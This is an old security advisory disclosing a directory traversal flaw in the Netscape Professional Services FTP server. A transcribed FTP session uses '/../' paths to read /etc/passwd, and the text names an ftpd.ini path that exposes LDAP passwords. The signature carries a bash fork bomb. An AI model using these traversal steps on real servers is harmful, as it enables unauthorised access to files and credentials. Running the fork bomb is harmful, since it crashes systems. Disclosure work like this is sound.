Standard disclaimer applies. These are my private oppinions and observations. Netscape Professional Services FTP server is used on high-performance servers for accessing virtual webserver accounts etc. It works with LDAP and seems to be quite often shipped by Sun with ISP instalations. Due to poor coding, whole virtual server structure, LDAP server and other parts of system are exposed to trivial attacks. There are also several overflows, but who cares, it's much easier: Long Live the Programmers! $ ftp ftp.XXXX.xxx Connected to ftp.XXXX.xxx. 220-FTP Server - Version 1.36 - (c) 1999 Netscape Professional Services 220 You will be logged off after 1200 seconds of inactivity. Name (ftp.XXXX.xxx:lcamtuf): anonymous 331 Anonymous user OK, send e-mail address as password. Password: 230 Logged in OK Remote system type is UNIX. Using binary mode to transfer files. ftp> cd ../../../dupa 550 Can't change directory to "/www1/customer/www.XXXX.xxx/a/n/o/n/anonymous/dupa" because No such file or directory [Well... this won't work... uh, lovely physical path, btw ;] ftp> cd /../../../dupa 550 Can't change directory to "/www1/customer/www.XXXX.xxx/a/n/dupa" because No such file or directory ftp> cd /../../../../dupa 550 Can't change directory to "/www1/customer/www.XXXX.xxx/a/dupa" because No such file or directory [Erm? Good God!] ftp> cd /../../../../../../../../etc/dupa 550 Can't change directory to "/etc/dupa" because No such file or directory ftp> cd /../../../../../../../../etc/ 250 CWD command successful. ftp> get /../../../../../../../../etc/passwd KUKU local: KUKU remote: /../../../../../../../../etc/passwd 200 PORT successfull, connected to A.B.C.D port 62437 150-Type of object is "unknown/unknown". Transfer MODE is BINARY. 150 Opening data connection 226 File downloaded successfully (602 bytes, 602 bytes xmitted) 602 bytes received in 1.71 secs (0.34 Kbytes/sec) ftp> quit 221-Goodbye. You uploaded 0 and downloaded 1 kbytes. 221 CPU time spent on you: 0.100 seconds. $ cat KUKU root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: ... Consequences: ------------- - downloading / uploading any files to remote system, regardless of (poorly) implemented limits, with ftp daemon privledges (you can exploit eg. /tmp races, download vital files from system or other accounts etc) - this ftp server supports LDAP users; different LDAP accounts are served on single physical UID. It means, any user can access and eventually overwrite files on other accounts; as it's used in cooperation with webserver, usually virutal web servers are affected, - by accessing eg. /../../../../../../../../opt/netscape/ftpd/conf/ftpd.ini, you can simply grab LDAP passwords. Fix: ---- ? Switching to open-source will be good. To developers: man chroot. _______________________________________________________ Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security] [http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};: =-----=> God is real, unless declared integer. <=-----=